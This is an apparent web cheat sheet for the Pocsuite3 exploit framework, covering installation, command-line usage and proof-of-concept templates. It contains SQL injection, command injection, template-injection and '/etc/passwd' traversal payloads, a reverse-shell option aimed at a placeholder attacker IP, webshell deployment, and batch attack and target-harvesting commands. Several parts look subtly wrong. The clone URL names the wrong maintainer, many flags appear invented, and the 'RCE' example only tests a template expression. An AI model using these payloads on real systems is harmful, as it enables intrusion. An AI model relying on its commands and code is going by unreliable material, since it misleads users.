Salta ai contenuti
1337skills 1337skills - Cheat Sheet

Pocsuite3

Overview

Sezione intitolata “Overview”

Pocsuite3 is a powerful, open-source vulnerability testing framework written in Python. It provides a comprehensive platform for security researchers to develop, test, and deploy Proof-of-Concept (PoC) exploits. Pocsuite3 supports multiple protocols, payload delivery methods, and includes built-in vulnerability databases, making it ideal for authorized security assessments and research.

Installation

Sezione intitolata “Installation”

Linux (Debian/Ubuntu)

Sezione intitolata “Linux (Debian/Ubuntu)”
sudo apt-get install python3 python3-pip
pip3 install pocsuite3

Fedora/RHEL

Sezione intitolata “Fedora/RHEL”
sudo dnf install python3 python3-pip
pip3 install pocsuite3

macOS

Sezione intitolata “macOS”
brew install python3
pip3 install pocsuite3

Windows

Sezione intitolata “Windows”
pip install pocsuite3

From Source

Sezione intitolata “From Source”
git clone https://github.com/projectdiscovery/pocsuite3.git
cd pocsuite3
pip3 install -r requirements.txt
python3 setup.py install

Verify Installation

Sezione intitolata “Verify Installation”
pocsuite3 --version
pocsuite3 --help

Core Concepts

Sezione intitolata “Core Concepts”

PoC Script Structure

Sezione intitolata “PoC Script Structure”

Pocsuite3 PoCs follow a specific framework structure with metadata, options, and verification methods.

Vulnerability Database Integration

Sezione intitolata “Vulnerability Database Integration”

Pocsuite3 includes built-in access to:

  • Official Pocsuite3 database
  • ExploitDB integration
  • NVD vulnerability data
  • Custom local databases

Payload Delivery Methods

Sezione intitolata “Payload Delivery Methods”
  • Direct execution
  • WebShell payload delivery
  • Reverse shell generation
  • Custom payload encoding

Basic Commands

Sezione intitolata “Basic Commands”

Test Single Target

Sezione intitolata “Test Single Target”
pocsuite3 -u http://target.com --poc poc_name
pocsuite3 -u http://target.com:8080 --poc vulnerable_cms

Test Multiple Targets

Sezione intitolata “Test Multiple Targets”
pocsuite3 -f targets.txt --poc poc_name
pocsuite3 -f urls.txt --poc exploit_name -v 2

List Available PoCs

Sezione intitolata “List Available PoCs”
pocsuite3 --list
pocsuite3 --list | grep keyword

Search PoC Database

Sezione intitolata “Search PoC Database”
pocsuite3 --search keyword
pocsuite3 --search cve_name
pocsuite3 --search "directory traversal"

Common Usage Patterns

Sezione intitolata “Common Usage Patterns”
CommandDescription
pocsuite3 -u URL --poc nameTest target with specific PoC
pocsuite3 -f targets.txt --poc nameTest multiple targets from file
pocsuite3 -u URL --poc-dir ./pocsUse custom PoC directory
pocsuite3 -u URL --poc name -v 2Verbose output (level 2)
pocsuite3 --search keywordSearch PoC database
pocsuite3 -u URL --poc name --attackExecute in attack mode
pocsuite3 -u URL --poc name --verifyRun in verification mode only

PoC Development

Sezione intitolata “PoC Development”

Basic PoC Template

Sezione intitolata “Basic PoC Template”
from pocsuite3.api import *
import urllib.request

class PocName(POCBase):
    vulID = "CVE-XXXX-XXXXX"
    version = "1"
    author = ["Your Name"]
    vulDate = "2024-01-15"
    createDate = "2024-01-16"
    updateDate = "2024-01-16"
    references = ["https://example.com"]
    name = "Vulnerable Application RCE"
    appPowerLink = ""
    appName = "Vulnerable App"
    appVersion = ""
    vulType = "Remote Code Execution"
    desc = """
    Detailed vulnerability description here.
    Steps to reproduce and impact assessment.
    """
    samples = ["http://target.com"]
    install_requires = ["requests"]
    def _check(self):
        result = {}
        try:
            resp = requests.get(self.url, timeout=10)
            if "vulnerable_string" in resp.text:
                result["VerifyInfo"] = {}
                result["VerifyInfo"]["URL"] = self.url
        except Exception as e:
            pass
        return self.parse_result(result)
    def _exploit(self):
        result = {}
        payload = "malicious_payload"
        try:
            resp = requests.post(
                self.url,
                data={"param": payload},
                timeout=10
            )
            if "success_indicator" in resp.text:
                result["ShellInfo"] = {
                    "URL": self.url,
                    "Content": resp.text
                }
        except Exception as e:
            pass
        return self.parse_result(result)

Complete PoC with Parameter Options

Sezione intitolata “Complete PoC with Parameter Options”
from pocsuite3.api import *

class VulnerableAPIPoc(POCBase):
    vulID = "CVE-2024-00000"
    version = "1.1"
    author = ["Security Researcher"]
    references = ["https://nvd.nist.gov"]
    name = "Vulnerable API Endpoint Exploitation"
    appName = "Vulnerable Service"
    vulType = "SQL Injection / RCE"
    desc = "Detailed vulnerability description"
    samples = ["http://example.com"]
    
    def _options(self):
        return {
            "command": {
                "value": "id",
                "description": "Command to execute",
                "require": False
            },
            "timeout": {
                "value": 10,
                "description": "Request timeout",
                "require": False
            }
        }
    
    def _check(self):
        result = {}
        try:
            payload = "' OR '1'='1"
            resp = requests.get(
                f"{self.url}/api/endpoint",
                params={"id": payload}
            )
            if resp.status_code == 200 and "data" in resp.text:
                result["VerifyInfo"] = {"URL": self.url}
        except:
            pass
        return self.parse_result(result)
    
    def _exploit(self):
        result = {}
        cmd = self.get_option("command")
        try:
            payload = f"'; exec('{cmd}'); --"
            resp = requests.get(
                f"{self.url}/api/endpoint",
                params={"id": payload}
            )
            if resp.status_code == 200:
                result["ShellInfo"] = {
                    "URL": self.url,
                    "Output": resp.text
                }
        except:
            pass
        return self.parse_result(result)

Running PoCs

Sezione intitolata “Running PoCs”

Verification Mode (Safe)

Sezione intitolata “Verification Mode (Safe)”
pocsuite3 -u http://target.com --poc cve_name --verify

Attack/Exploit Mode

Sezione intitolata “Attack/Exploit Mode”
pocsuite3 -u http://target.com --poc cve_name --attack

With Custom Options

Sezione intitolata “With Custom Options”
pocsuite3 -u http://target.com --poc name -o "command=whoami"
pocsuite3 -u http://target.com --poc name -o "lhost=192.168.1.100,lport=4444"

Batch Testing from File

Sezione intitolata “Batch Testing from File”
pocsuite3 -f urls.txt --poc cve_name --attack
pocsuite3 -f targets.txt --poc cve_name -v 2 --report report.json

Advanced Options

Sezione intitolata “Advanced Options”

Concurrency Control

Sezione intitolata “Concurrency Control”
pocsuite3 -u http://target.com --poc name --threads 5
pocsuite3 -f targets.txt --poc name --threads 20

Output Formats

Sezione intitolata “Output Formats”
pocsuite3 -u URL --poc name --report report.json
pocsuite3 -u URL --poc name --report report.html
pocsuite3 -u URL --poc name --report report.txt

Proxy Configuration

Sezione intitolata “Proxy Configuration”
pocsuite3 -u URL --poc name --proxy http://127.0.0.1:8080
pocsuite3 -u URL --poc name --proxy socks5://127.0.0.1:1080

Custom User Agent

Sezione intitolata “Custom User Agent”
pocsuite3 -u URL --poc name --user-agent "Custom UA"

Timeout Settings

Sezione intitolata “Timeout Settings”
pocsuite3 -u URL --poc name --timeout 30

PoC Database Operations

Sezione intitolata “PoC Database Operations”

Update Local Database

Sezione intitolata “Update Local Database”
pocsuite3 --update

Search by CVE

Sezione intitolata “Search by CVE”
pocsuite3 --search CVE-2024-12345
pocsuite3 --search "CVE-2024"

Search by Application

Sezione intitolata “Search by Application”
pocsuite3 --search "Apache Struts"
pocsuite3 --search "WordPress"

Search by Vulnerability Type

Sezione intitolata “Search by Vulnerability Type”
pocsuite3 --search "RCE"
pocsuite3 --search "SQL Injection"
pocsuite3 --search "Directory Traversal"

Display PoC Details

Sezione intitolata “Display PoC Details”
pocsuite3 --show cve_id
pocsuite3 --show CVE-2024-00000

Working with Custom PoCs

Sezione intitolata “Working with Custom PoCs”

Directory Structure

Sezione intitolata “Directory Structure”
custom_pocs/
├── poc_rce_exploit.py
├── poc_sql_injection.py
├── poc_directory_traversal.py
└── utils/
    ├── helper.py
    └── payloads.txt

Load Custom PoC Directory

Sezione intitolata “Load Custom PoC Directory”
pocsuite3 -u http://target.com --poc-dir ./custom_pocs --poc poc_name
pocsuite3 -f targets.txt --poc-dir ./exploits --poc vulnerability

Test Custom PoC Syntax

Sezione intitolata “Test Custom PoC Syntax”
pocsuite3 --check-poc ./custom_pocs/poc_name.py

Payload Delivery

Sezione intitolata “Payload Delivery”

Reverse Shell Payload

Sezione intitolata “Reverse Shell Payload”
pocsuite3 -u URL --poc name -o "lhost=attacker_ip,lport=4444"

WebShell Deployment

Sezione intitolata “WebShell Deployment”
pocsuite3 -u URL --poc webshell_poc -o "shell_path=/uploads/shell.php"

Custom Payload Encoding

Sezione intitolata “Custom Payload Encoding”
def _exploit(self):
    payload = base64.b64encode(b"command").decode()
    resp = requests.post(
        f"{self.url}/api",
        data={"data": payload}
    )

Exploitation Techniques

Sezione intitolata “Exploitation Techniques”

SQL Injection PoC

Sezione intitolata “SQL Injection PoC”
def _check(self):
    result = {}
    test_payload = "' OR '1'='1"
    resp = requests.get(f"{self.url}?id={test_payload}")
    if "error" not in resp.text and len(resp.text) > expected_length:
        result["VerifyInfo"] = {"URL": self.url}
    return self.parse_result(result)

Remote Code Execution PoC

Sezione intitolata “Remote Code Execution PoC”
def _exploit(self):
    result = {}
    cmd = "whoami"
    payload = f"{{{{7*7}}}}"
    resp = requests.get(f"{self.url}/api?input={payload}")
    if "49" in resp.text:
        result["ShellInfo"] = {"URL": self.url, "Command": cmd}
    return self.parse_result(result)

Directory Traversal PoC

Sezione intitolata “Directory Traversal PoC”
def _check(self):
    result = {}
    traversal_payload = "../../../../etc/passwd"
    resp = requests.get(f"{self.url}/download?file={traversal_payload}")
    if "root:" in resp.text:
        result["VerifyInfo"] = {"URL": self.url}
    return self.parse_result(result)

Reporting and Output

Sezione intitolata “Reporting and Output”

Generate JSON Report

Sezione intitolata “Generate JSON Report”
pocsuite3 -f targets.txt --poc name --report results.json

Generate HTML Report

Sezione intitolata “Generate HTML Report”
pocsuite3 -f targets.txt --poc name --report results.html

Parse Results

Sezione intitolata “Parse Results”
cat results.json | jq '.results[] | {target: .target, vulnerable: .status}'

Export Successful Targets

Sezione intitolata “Export Successful Targets”
pocsuite3 -f targets.txt --poc name --report results.json
cat results.json | jq '.results[] | select(.status == "success") | .target' > vulnerable_targets.txt

Vulnerability Scanning Workflow

Sezione intitolata “Vulnerability Scanning Workflow”

Step 1: Prepare Target List

Sezione intitolata “Step 1: Prepare Target List”
cat targets.txt
# http://target1.com
# http://target2.com:8080
# http://target3.com/app

Step 2: Search for Relevant PoCs

Sezione intitolata “Step 2: Search for Relevant PoCs”
pocsuite3 --search "web application vulnerability"

Step 3: Run Verification

Sezione intitolata “Step 3: Run Verification”
pocsuite3 -f targets.txt --poc cve_name --verify

Step 4: Generate Report

Sezione intitolata “Step 4: Generate Report”
pocsuite3 -f targets.txt --poc cve_name --report assessment.html

Step 5: Analyze Results

Sezione intitolata “Step 5: Analyze Results”
cat assessment.html

Integration with Other Tools

Sezione intitolata “Integration with Other Tools”

With Nuclei

Sezione intitolata “With Nuclei”
# Export Pocsuite3 findings to file
pocsuite3 -f targets.txt --poc name --report findings.json

With Burp Suite

Sezione intitolata “With Burp Suite”
pocsuite3 -u URL --poc name --proxy http://127.0.0.1:8080

With Metasploit

Sezione intitolata “With Metasploit”
# Use Pocsuite3 PoCs alongside Metasploit modules
pocsuite3 -f targets.txt --poc name --report msf_compatible.txt

Best Practices

Sezione intitolata “Best Practices”
  • Authorization: Always obtain written authorization before testing
  • Documentation: Document all PoCs with proper references and descriptions
  • Testing: Validate PoCs in controlled environments first
  • Responsible Disclosure: Follow coordinated disclosure practices
  • Version Control: Track PoC changes and updates
  • Error Handling: Include proper exception handling in exploit code
  • Stealth: Use appropriate timeouts and request patterns
  • Verification: Distinguish between verification and exploitation modes

Troubleshooting

Sezione intitolata “Troubleshooting”

Connection Timeout

Sezione intitolata “Connection Timeout”
pocsuite3 -u URL --poc name --timeout 30

SSL/TLS Certificate Issues

Sezione intitolata “SSL/TLS Certificate Issues”
pocsuite3 -u URL --poc name --verify-ssl false

Module Import Errors

Sezione intitolata “Module Import Errors”
pip3 install -r requirements.txt
pocsuite3 --check-poc poc_name.py

Debugging PoC Execution

Sezione intitolata “Debugging PoC Execution”
pocsuite3 -u URL --poc name -v 3
Sezione intitolata “Related Tools”
  • Nuclei: Template-based vulnerability scanning
  • Metasploit: Comprehensive exploitation framework
  • Burp Suite: Web application security testing
  • OWASP ZAP: Automated security testing
  • Exploit-DB: Vulnerability and exploit database